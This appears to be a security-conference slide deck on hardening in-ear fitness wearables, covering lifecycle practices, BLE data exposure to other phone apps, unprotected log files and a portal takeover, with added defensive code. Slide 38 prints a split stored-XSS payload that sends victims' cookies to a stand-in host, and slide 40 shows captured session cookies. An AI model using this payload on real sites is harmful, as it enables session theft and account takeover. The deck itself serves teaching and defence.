
Securing your in-ear fitness coach: Challenges in hardening next generation wearables (PowerPoint PPT presentation)



  1. Securing your in-ear fitness coach: Challenges in hardening next generation wearables
 Kavya Racharla, Sumanth Naropanth

  2. Who are we?
 • Kavya Racharla
   • Security Research Manager, Sports Group, Intel
   • Oracle & Qualcomm
 • Sumanth Naropanth
   • Founder and CEO, Deep Armor
   • Intel, Palm/HP, Sun Microsystems
   • Security consulting, vulnerability testing, SDL and training services for emerging technologies
   • www.deeparmor.com | @deep_armor

  3. Security problems in new devices: how do we address them?

  4. Agenda
 • Introduction to an in-ear fitness coach
 • Unshackling from traditional SDL methods
 • Securely designing a software fitness coach
 • Hardware, firmware & software paradigms
 • Ecosystem security
 • Real-world problems: weaknesses and demos
 • Privacy

  5. IoT/Wearable Ecosystem (diagram). Tiers from the bottom up: Sensors (BLE/ANT+) -> Nodes (BT/BLE/NFC, Zigbee/Z-wave) -> Gateways (BT/BLE/WiFi/NFC) -> Back End Services (HTTP/HTTPS).

  6. Case Study: In-ear fitness coach. Wearable = comfortable, smart, untethered, continuous learning, data/analytics, better quality of life.

  7. Securing an in-ear fitness coach

  8. Unshackling from traditional SDL

  9. Challenges: Securing a never-before gadget
 • Lack of tactical SDL frameworks for rapid time-to-market products with constantly evolving requirements
 • Diverse, non-standard and evolving communication protocols
 • Weaknesses in adoption of protocol specifications
 • Long lives for IoT products
 • Privacy
 • Nascent research in IoT security

  10. Challenges - Technical
 • Collection of personal data and PII is higher
   • Geo-location information
   • Biometric data
   • Sensor data
   • Payment services
 • Limited SW stack -> security may get compromised
   • Often FW running on micro-controllers
   • Field updates are difficult
   • Asymmetric key crypto, TEEs, etc. are heavy
 • Multi-tier, multi-tenant product architecture
   • Cross-domain flows
   • Multiple exposure points as a consequence

  11. Proposal: Securing a never-before gadget
 • Next-gen SDL for IoT, wearable and cloud technologies, especially when they all come together
 • Ecosystem security
 • Agile
 • Security, Privacy and Legal woven into the development cycle
 • Leveraging industry standards


  12. Introducing SPDL (table: security and privacy activities laid over the product development lifecycle)
 Product Development Lifecycle: Program Conception to Pre-Alpha | Alpha | Beta to Launch | Post Launch
 Security: Threat Modeling & Attack Trees | Architecture Reviews | Code Reviews & Static Code Analysis | Penetration Testing | Incident Response
 Privacy: Privacy Req.; Data Access Review; Stakeholder identification | Privacy test cases & Data Availability | Privacy Sign-off, Legal sign-off & Incident Response Plan

  13. Designing SPDL

  14. Security topics: Cloud, Mobile, Device, IoT/Wearables

  15. Hardware & Firmware Security Paradigms (diagram, Device Hardware layer up to Device Software layer)
 Secure Boot, TEE, Key Management, Secure Debug Port (access restrictions & lockdown), Secure Storage, Secure Erase, Secure FOTA, Data At Rest Encryption, Signed libraries, Device Software security, Service layer security, Protocol sandboxing, Data security

  16. SW Security Paradigms: application SW
 • Multi-app <-> multi-device secure implementation: spec and code
 • Secure communication
 • Secure storage of app-specific data, keys, logs, databases and user-specific data
 • App Store scanning
 • Privacy: opt-in/opt-out policy
 • 3rd-party SDK security enforcement
 • HW-backed keystore/keychain

  17. Cloud Software & Infrastructure Security
 • Secure key management and provisioning
 • Secure storage of user and enterprise data, at-rest encryption
 • Web portal security (HTML/JS attacks)
 • User & roles management
 • Infrastructure hardening, secure configuration
 • Privacy: data storage, sharing and retention policies
 • Micro-services security
 • Security DevOps

  18. Ecosystem security challenges
 • Design weaknesses in comms protocol adoption
 • Secure key negotiation and distribution
 • Network security
 • Gateway/node updates
 • Secure provisioning

  19. Real world security problems

  20. Demo 1: Ecosystem Challenges

  21. Demo 1: Ecosystem overview (diagram): wearable <-BT/BLE/ANT+-> phone <-BT/BLE-> ... <-HTTPS-> Back End Services

  22. Device communication
 Device commands:
 • Put device into recovery mode
 • Do a FW update
 • Change device (BLE) name
 Notifications:
 • Social apps
 • Calls and texts
 Information:
 • User activity data
 • User profile updates
 • Application action (calls, music control)
 • Call/text/social updates (sometimes)

  23-24. The Problem (prelude, then the attack)
 The same device commands, notifications and information as slide 22, with the BLE link between phone and wearable labelled ENCRYPTED and an ATTACKER drawn on the phone side, next to the legitimate app, on the same channel.

  25. Root Cause
 All applications on Android and iOS can subscribe to the BT service and get the data on the same BT channels or BLE characteristics as the legitimate app. The link-layer encryption negotiated at pairing protects only the radio hop: the phone OS holds the bond keys and exposes the paired device's characteristics to every app that holds the Bluetooth permission.
 • Android: android.permission.BLUETOOTH, android.permission.BLUETOOTH_ADMIN (from Android 12 these became the runtime permissions BLUETOOTH_SCAN / BLUETOOTH_CONNECT; an app that has been granted them sees the same characteristics)
 • iOS: Core Bluetooth (CB) framework; Centrals (client/phone) and Peripherals (server/wearable) classes

  26. Example – Wearable Ecosystem 1
 • Uses BLE
 • Proprietary code
 • Existing market research for format of messages and headers
 • Malware app subscribes to the known BLE characteristics and gets the data synced with the legit app

  27. Example – Wearable Ecosystem 1

  28. Example – Wearable Ecosystem 2
 • Similar, but with a twist
 • Malware application cannot send commands to the wearable by itself
 • Legitimate app opens a connection to the device
 • The malware app piggybacks on that open connection to send commands to the wearable
 Moral: partial security does not help. Protect not just the handshake but every message.

  29. Example – Wearable Ecosystem 2
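The protection the moral asks for, written out as an added example (this is not code from the talk or from any vendor's wearable): every message on the characteristic, in both directions, is encrypted and authenticated under a session secret that the phone app and the wearable share from pairing/provisioning (assumed), and each direction carries a counter so a captured frame cannot be replayed. A second app on the phone that reaches the same characteristic then sees only ciphertext on notifications and cannot inject, replay or modify commands on the connection the legitimate app opened. Python's standard library has no AEAD, so encrypt-then-MAC with HMAC-SHA256 (counter-mode keystream plus a truncated tag) stands in for the AES-GCM or ChaCha20-Poly1305 a firmware would use; the frame layout, the `Wearable`/`PhoneApp` classes and the `CMD:` strings are assumptions made for the example, and the activity payload is constructed.

```python
import hashlib
import hmac
import secrets
import struct

# Assumed frame layout on the BLE characteristic:
#   direction (1 byte) || counter (4 bytes, big-endian) || ciphertext || tag (16 bytes)
HDR = struct.Struct(">BI")
TAG_LEN = 16
TO_WEARABLE, TO_PHONE = 0, 1


def derive_keys(session_secret: bytes):
    """Separate encryption and MAC keys from the secret shared at pairing/provisioning."""
    enc_key = hmac.new(session_secret, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(session_secret, b"mac", hashlib.sha256).digest()
    return enc_key, mac_key


def _keystream(enc_key: bytes, header: bytes, length: int) -> bytes:
    # HMAC-SHA256 in counter mode as the PRF (stand-in for AES-CTR/ChaCha20). The header
    # (direction + message counter) is the nonce, so keystream is never reused.
    out, block = b"", 0
    while len(out) < length:
        out += hmac.new(enc_key, header + struct.pack(">I", block), hashlib.sha256).digest()
        block += 1
    return out[:length]


def seal(enc_key: bytes, mac_key: bytes, direction: int, counter: int, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC one message; the tag also covers direction and counter."""
    header = HDR.pack(direction, counter)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, header, len(plaintext))))
    tag = hmac.new(mac_key, header + ct, hashlib.sha256).digest()[:TAG_LEN]
    return header + ct + tag


def open_frame(enc_key, mac_key, direction, last_counter, frame):
    """Check tag, direction and counter before decrypting; ValueError on any failure."""
    if len(frame) < HDR.size + TAG_LEN:
        raise ValueError("short frame")
    header, ct, tag = frame[:HDR.size], frame[HDR.size:-TAG_LEN], frame[-TAG_LEN:]
    expected = hmac.new(mac_key, header + ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad tag")        # forged without the key, or tampered
    frame_dir, counter = HDR.unpack(header)
    if frame_dir != direction:
        raise ValueError("reflected")      # one of our own frames bounced back
    if counter <= last_counter:
        raise ValueError("replay")
    return counter, bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, header, len(ct))))


class Wearable:
    def __init__(self, session_secret: bytes):
        self.enc_key, self.mac_key = derive_keys(session_secret)
        self.rx_counter = self.tx_counter = 0
        self.mode = "normal"

    def on_characteristic_write(self, frame: bytes) -> str:
        try:
            self.rx_counter, cmd = open_frame(self.enc_key, self.mac_key, TO_WEARABLE, self.rx_counter, frame)
        except ValueError as err:
            return f"rejected: {err}"
        if cmd == b"CMD:RECOVERY":         # the "put device into recovery mode" command of slide 22
            self.mode = "recovery"
        return "ok"

    def notify(self, payload: bytes) -> bytes:
        self.tx_counter += 1
        return seal(self.enc_key, self.mac_key, TO_PHONE, self.tx_counter, payload)


class PhoneApp:
    def __init__(self, session_secret: bytes):
        self.enc_key, self.mac_key = derive_keys(session_secret)
        self.rx_counter = self.tx_counter = 0

    def send(self, cmd: bytes) -> bytes:
        self.tx_counter += 1
        return seal(self.enc_key, self.mac_key, TO_WEARABLE, self.tx_counter, cmd)

    def receive(self, frame: bytes) -> bytes:
        self.rx_counter, payload = open_frame(self.enc_key, self.mac_key, TO_PHONE, self.rx_counter, frame)
        return payload


def run_scenario() -> dict:
    """Both ecosystem examples, with a second app watching and writing the same characteristic."""
    secret = secrets.token_bytes(32)       # assumed: established at pairing/provisioning
    wearable, app = Wearable(secret), PhoneApp(secret)
    results = {}
    # Ecosystem 1: the subscribed malware app receives the same notification bytes as the legit app
    frame = wearable.notify(b'{"steps":1234,"hr":88}')   # constructed sample activity data
    results["malware_sees_plaintext"] = b"steps" in frame
    results["legit_app_reads"] = app.receive(frame)
    # Ecosystem 2: malware piggybacks on the connection the legit app opened
    forged = HDR.pack(TO_WEARABLE, 99) + b"CMD:RECOVERY" + bytes(TAG_LEN)   # no key, guessed tag
    results["inject_without_key"] = wearable.on_characteristic_write(forged)
    legit = app.send(b"CMD:SET_NAME:Coach")
    results["legit_command"] = wearable.on_characteristic_write(legit)
    results["replay"] = wearable.on_characteristic_write(legit)          # captured and resent
    tampered = bytearray(legit)
    tampered[HDR.size] ^= 0x01                                           # flip one ciphertext bit
    results["tamper"] = wearable.on_characteristic_write(bytes(tampered))
    results["mode"] = wearable.mode
    return results
```

The second app still learns message lengths and timing, and it still needs to be kept off the session secret, which is why slide 16 pairs this with a HW-backed keystore: the protection only holds if the key never sits in a file another app can read.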

  30. Demo 2: Protecting User data in logs

  31. Demo 2: Environment (screenshots): coach commentary, language definitions, dialogue definitions

  32. The Problem
 • Coach commentary, language definitions and dialogue stored as PLAIN TEXT files
 • FIT files and JSON files stored in public storage (due to private storage limitations)
 • Contains PII and IP
 • Attacker can tamper with or copy over the text files
   • DoS
   • Code execution
 • Accessible by malicious apps

  33. Our Recommendation
 • Avoid public storage whenever possible
 • Support for encryption
   • Keys must be user-specific or application-specific to prevent BORE (break once, run everywhere)
 • Support for signing dialogue files or any sensitive information in public storage
 • Capability to delete / opt out of dialogue logging
   • Cloud
   • App
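One way to implement the signing and per-user-key recommendations, as an added example and not code from the talk or from the product: the app writes its dialogue/JSON file to public storage inside a signed envelope whose HMAC key is derived per user from a master key, so a key pulled out of one installation verifies nobody else's files and a file copied from another phone does not verify either. The master key is `os.urandom` here, standing in for a key held in the HW-backed keystore of slide 16 (assumption); the envelope layout, file name and sample dialogue are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import os
import tempfile


def _canonical(obj) -> bytes:
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def user_file_key(master_key: bytes, user_id: str) -> bytes:
    """Per-user subkey: a key extracted from one installation verifies nobody else's files."""
    return hmac.new(master_key, b"dialogue-file|" + user_id.encode(), hashlib.sha256).digest()


def _tag(key: bytes, user_id: str, body: bytes) -> str:
    # Binding user_id into the MAC stops a file signed for A from being re-labelled for B.
    return hmac.new(key, user_id.encode() + b"\x00" + body, hashlib.sha256).hexdigest()


def write_signed(path: str, key: bytes, user_id: str, payload: dict) -> None:
    body = _canonical(payload)
    envelope = {"user": user_id, "payload": base64.b64encode(body).decode(), "tag": _tag(key, user_id, body)}
    with open(path, "w") as f:
        json.dump(envelope, f)


def read_signed(path: str, key: bytes, user_id: str) -> dict:
    """Verify before parsing anything that came from public storage; ValueError on any mismatch."""
    with open(path) as f:
        env = json.load(f)
    if env.get("user") != user_id:
        raise ValueError("file belongs to another user")
    body = base64.b64decode(env.get("payload", ""))
    if not hmac.compare_digest(env.get("tag", ""), _tag(key, user_id, body)):
        raise ValueError("signature mismatch: tampered, or signed for a different user/key")
    return json.loads(body)


def _try_read(path: str, key: bytes, user_id: str) -> str:
    try:
        read_signed(path, key, user_id)
        return "accepted"
    except ValueError as err:
        return str(err)


def run_scenario() -> dict:
    master = os.urandom(32)   # assumption: stands in for a key held in the HW-backed keystore
    dialogue = {"lang": "en", "lines": ["Pace up, 2 km to go"], "hr_zone": 4}   # constructed sample
    results = {}
    with tempfile.TemporaryDirectory() as public_dir:   # stands in for public/external storage
        path = os.path.join(public_dir, "coach_dialogue.json")
        key_a = user_file_key(master, "user-a")
        write_signed(path, key_a, "user-a", dialogue)
        results["roundtrip"] = read_signed(path, key_a, "user-a") == dialogue

        # A malicious app with access to public storage edits the commentary in place
        with open(path) as f:
            env = json.load(f)
        body = json.loads(base64.b64decode(env["payload"]))
        body["lines"] = ["<tampered commentary>"]
        env["payload"] = base64.b64encode(_canonical(body)).decode()
        with open(path, "w") as f:
            json.dump(env, f)
        results["tampered"] = _try_read(path, key_a, "user-a")

        # The file is copied off user A's phone, re-labelled, and offered to user B's app
        write_signed(path, key_a, "user-a", dialogue)
        with open(path) as f:
            env = json.load(f)
        env["user"] = "user-b"
        with open(path, "w") as f:
            json.dump(env, f)
        results["relabelled_for_other_user"] = _try_read(path, user_file_key(master, "user-b"), "user-b")
    return results
```

Signing alone stops the tamper/DoS/code-execution path but leaves the PII readable; where the file has to stay in public storage, the same per-user key derivation feeds the encryption the slide also asks for.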

  34. Demo 3: Admin portal takeover

  35. Demo 3: Ecosystem overview (diagram: wearable <-BT/BLE-> phone <-HTTPS-> Cloud Portal)
 User portal: login and sign-up; connect with friends; comment on friends' profiles; profile and activity management
 Admin portal: remote device management; data management

  36. Target : Sign-up and Profile pages

  37. Exploit Scenario
 • Attacker uses the "friend request" functionality on the user portal
 • The "friend request" loads when the victim logs into his/her account; the victim takes no action to view or accept the invite
 • Attacker exploits an XSS vulnerability in the user portal / sign-up pages
 • Uses two accounts to launch the attack, which gives 2X the number of characters for the exploit code
 • Exploit code expandable up to 5 notifications (or 5 "friend" requests)

  38. Exploit Scenario: The attack
 Account 1: First Name: Arya<script>i=new Image();u= | Last Name: navigator.userAgent</script> | Email: arya@stark.com
 Account 2: First Name: <script>i.src='http://x0?c=' | Last Name: +document.cookie+u</script>Jon | Email: jon@stark.com
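How the split payload works against a sign-up form with a per-field length limit, and what the fix looks like, as an added example (not the portal's code, which the talk does not show): the notification widget concatenates first and last names straight into HTML, so each account's two short fields join into one complete `<script>` block, the two blocks share the globals `i` and `u` when the victim's page loads, and no single field ever exceeds the limit. The `FIELD_LIMIT` of 32 is hypothetical; the two accounts are the ones on slide 38; the widget markup is assumed.

```python
import html
import re

FIELD_LIMIT = 32   # hypothetical per-field length limit on the sign-up form

# The two accounts from slide 38 (straight quotes; the page's curly quote is an extraction artifact)
ATTACK_ACCOUNTS = [
    {"first": "Arya<script>i=new Image();u=", "last": "navigator.userAgent</script>", "email": "arya@stark.com"},
    {"first": "<script>i.src='http://x0?c='", "last": "+document.cookie+u</script>Jon", "email": "jon@stark.com"},
]
SCRIPT_RE = re.compile(r"<script>(.*?)</script>", re.DOTALL)


def fields_fit(accounts, limit: int = FIELD_LIMIT) -> bool:
    """Every fragment passes a per-field limit that the whole payload would not."""
    return all(len(a["first"]) <= limit and len(a["last"]) <= limit for a in accounts)


def full_payload_length(accounts) -> int:
    return sum(len(a["first"]) + len(a["last"]) for a in accounts)


def render_friend_requests_vulnerable(accounts) -> str:
    # Names go into the notification markup by string concatenation (the bug).
    rows = [f"<li>{a['first']} {a['last']} sent you a friend request</li>" for a in accounts]
    return "<ul>" + "".join(rows) + "</ul>"


def render_friend_requests_safe(accounts) -> str:
    # Same widget, with HTML output encoding at the point of insertion.
    rows = [
        f"<li>{html.escape(a['first'])} {html.escape(a['last'])} sent you a friend request</li>"
        for a in accounts
    ]
    return "<ul>" + "".join(rows) + "</ul>"


def scripts_in(page: str) -> list:
    """Script bodies the victim's browser would run, in page order, when the widget loads."""
    return SCRIPT_RE.findall(page)
```

Escaping at output is the fix for the rendering bug; separately, marking the session cookie HttpOnly would have kept `document.cookie` on slide 40 from handing over `engageUser`, although it would not have removed the XSS itself.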

  39. Victim - logs in

  40. Attacker's C&C: victim's cookies and UA
 _ga=GA1.2.1543537304.1450072994; engageUser=ads9hnrfj7a3uhd9cnd8esa4g7; _gat=1; _ra=0.100149.1450085069;
 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36

  41. Access to admin portal
 • Victim = Admin!
 • Cloud -> remote device management
 • With the stolen cookies set, the attacker's browser seamlessly opens every page of the victim (the session cookie was readable from script, so it was not marked HttpOnly)

  42. The Attack
 • Stolen admin session cookies used to access the admin portal
 • Remote device take-over
 • Unauthorized access to user profile data
 • Unintended access to user accounts
 • Malicious FW updates rolled out
 • Several security and privacy violations!

  43. Privacy
 • Lives on your body or in your vicinity => access to a wealth of PII/sensitive data
 • What is PII or personal data?
 • Data management: collector/owner/processor/...
 • 3rd-party data access
 • Data retention and deletion policies

